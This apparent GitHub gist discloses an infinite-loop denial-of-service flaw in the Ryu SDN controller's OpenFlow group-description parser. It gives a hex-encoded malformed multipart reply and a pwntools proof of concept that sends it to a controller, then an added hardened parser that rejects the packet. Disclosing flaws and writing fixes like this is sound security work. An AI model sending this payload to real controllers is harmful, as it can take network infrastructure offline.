@ErodedElk
Created April 9, 2024 17:15
An issue was discovered in OFPGroupDescStats in parser.py in Faucet SDN Ryu version 4.34, which allows remote attackers to cause a denial of service (DoS) via an infinite loop.

In /ryu/ofproto/ofproto_v1_3_parser.py, around line 4685:

```python
class OFPGroupDescStats(StringifyMixin):
    @classmethod
    def parser(cls, buf, offset):
        # ... (the fixed header of the stats entry is unpacked here)
        while length < stats.length:
            bucket = OFPBucket.parser(buf, offset)
            stats.buckets.append(bucket)

            # bucket.len is taken straight from the wire; nothing checks that it is non-zero
            offset += bucket.len
            length += bucket.len
```

If the bucket's len field is 0, offset and length never change, so the parser falls into an infinite loop.

Payload:

```python
# OpenFlow header: version 4 (OF1.3), type 0x13 = OFPT_MULTIPART_REPLY, length 0x38 = 56, xid 0,
# followed by the multipart header: type 7 = OFPMP_GROUP_DESC, flags 0, 4 bytes of padding
brk = b"\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
# ofp_group_desc_stats: length 0x28 = 40, type 0 (OFPGT_ALL), 1 byte of padding
brk += b"\x00\x28\x00\x00"
# group_id 0
brk += b"\x00\x00\x00\x00"
# ofp_bucket: len 0x0000 (the tampered field), weight 1, watch_port and watch_group 0xffffffff,
# 4 bytes of padding, then one 16-byte OFPAT_OUTPUT action (port 1, max_len 0xffe5)
bucket = "00000001ffffffffffffffff000000000000001000000001ffe5000000000000"
brk += bytes.fromhex(bucket)
```

PoC:

```python
from pwn import *

# Connects to the controller's OpenFlow port and sends the message built above
p = remote("0.0.0.0", 6633)
brk = b"\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
brk += b"\x00\x28\x00\x00"
brk += b"\x00\x00\x00\x00"
bucket = "00000001ffffffffffffffff000000000000001000000001ffe5000000000000"
brk += bytes.fromhex(bucket)
p.send(brk)
p.interactive()
```

This PoC uses OFPGroupDescStatsReply as the example. An OFPGroupDescStatsReply message carries an OFPGroupDescStats structure, and in that structure the length field of the OFPBucket is tampered with to 0.
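As an added example (not part of the gist and not Ryu's own code): a standalone parser for the same OFPMP_GROUP_DESC bucket list with the bounds checks the loop above lacks, plus a builder that reproduces the report's message so the checks can be exercised against it. The names parse_group_desc_buckets, build_group_desc_reply, parse_reply, rejects and MalformedBucket are my own; the structure sizes are the fixed OpenFlow 1.3 layouts.

```python
import struct

OFP_HEADER_LEN = 8            # version(1) type(1) length(2) xid(4)
OFP_MULTIPART_HDR_LEN = 8     # type(2) flags(2) pad(4)
OFP_GROUP_DESC_STATS_HDR = 8  # length(2) type(1) pad(1) group_id(4)
OFP_BUCKET_HDR = 16           # len(2) weight(2) watch_port(4) watch_group(4) pad(4)

class MalformedBucket(ValueError):
    """Raised instead of looping when a bucket's len field cannot advance the cursor."""

def parse_group_desc_buckets(buf, offset, stats_length):
    """Same loop shape as Ryu's parser, plus the checks that stop it on hostile input:
    len must cover the fixed bucket header and stay inside the stats entry and buffer."""
    buckets = []
    length = OFP_GROUP_DESC_STATS_HDR
    while length < stats_length:
        if offset + OFP_BUCKET_HDR > len(buf):
            raise MalformedBucket("bucket header runs past the end of the buffer")
        blen, weight, watch_port, watch_group = struct.unpack_from("!HHII", buf, offset)
        if blen < OFP_BUCKET_HDR:  # len=0 is the report's case: offset and length never move
            raise MalformedBucket("bucket len %d < %d" % (blen, OFP_BUCKET_HDR))
        if length + blen > stats_length or offset + blen > len(buf):
            raise MalformedBucket("bucket overruns the group desc stats entry or buffer")
        buckets.append((blen, weight, watch_port, watch_group))
        offset += blen
        length += blen
    return buckets

def build_group_desc_reply(bucket_len):
    """Constructed OFPT_MULTIPART_REPLY / OFPMP_GROUP_DESC carrying one 32-byte bucket
    (a single OFPAT_OUTPUT action) whose len field is bucket_len; 0 reproduces the report."""
    action = struct.pack("!HHIH6x", 0, 16, 1, 0xffe5)
    bucket = struct.pack("!HHII4x", bucket_len, 1, 0xffffffff, 0xffffffff) + action
    stats = struct.pack("!HBxI", OFP_GROUP_DESC_STATS_HDR + len(bucket), 0, 0) + bucket
    body = struct.pack("!HH4x", 7, 0) + stats  # multipart type 7 = OFPMP_GROUP_DESC
    return struct.pack("!BBHI", 4, 0x13, OFP_HEADER_LEN + len(body), 0) + body

def parse_reply(msg):
    """Skip the OpenFlow and multipart headers, then parse the single stats entry."""
    offset = OFP_HEADER_LEN + OFP_MULTIPART_HDR_LEN
    stats_length, = struct.unpack_from("!H", msg, offset)
    return parse_group_desc_buckets(msg, offset + OFP_GROUP_DESC_STATS_HDR, stats_length)

def rejects(msg):
    """True if the hardened parser refuses msg instead of hanging on it."""
    try:
        parse_reply(msg)
        return False
    except MalformedBucket:
        return True
```

With bucket_len=32 the same message parses to one bucket; with 0 (the report's value), a length shorter than the bucket header, or one that overruns the entry, the parser raises instead of spinning.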

The same loop appears in the following files:

/ryu/ofproto/ofproto_v1_3_parser.py, around line 4685

/ryu/ofproto/ofproto_v1_4_parser.py, around line 2548

/ryu/ofproto/ofproto_v1_5_parser.py, around line 5893
